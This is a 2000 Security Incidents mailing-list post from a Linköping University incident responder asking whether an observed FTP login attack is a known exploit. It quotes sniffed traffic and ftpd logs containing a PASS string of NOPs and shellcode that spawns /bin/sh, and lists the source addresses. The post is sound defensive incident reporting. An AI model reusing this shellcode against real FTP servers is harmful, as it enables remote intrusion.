Security Incidents mailing list archives
New or old FTP exploit?
From: Kent Engström <kent () UNIT LIU SE>
Date: Mon, 7 Aug 2000 19:17:00 +0200
Our /16 has been scanned at least two times from different foreign addresses during the last weeks with an exploit that seems to be the same. On both occasions, the connections are to port 21 with the would-be intruder trying to log in as "USER ftp" and "PASS long-string-with-nops-and-shellcode-in-it". From one of our users, I got the following log saved by sniffit:
USER ftp USER ftp PASS 1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^C1ÉþÉ1À^° ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV°Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11 PASS 1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^C1ÉþÉ1À^° ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV°Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11
Another user sent me this:
Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx], 1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11 Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13
Could somebody please tell me if this is an old exploit for some FTP deamon, or a new exploit? We have seen attacks coming from: 200.255.45.90 ppp50.cruiser.com.br 212.69.228.245 Legend Internet Ltd -- Kent Engström, Linköping University Incident Response Team kent () unit liu se abuse () liu se +46 13 28 1744 UNIT, Linköping University; SE-581 83 LINKÖPING; SWEDEN
Current thread:
- New or old FTP exploit? Kent Engström (Aug 07)
- Re: New or old FTP exploit? Przemyslaw Frasunek (Aug 09)
- Re: New or old FTP exploit? Fredrik Ostergren (Aug 10)
- Re: New or old FTP exploit? Bruce Dang (Aug 10)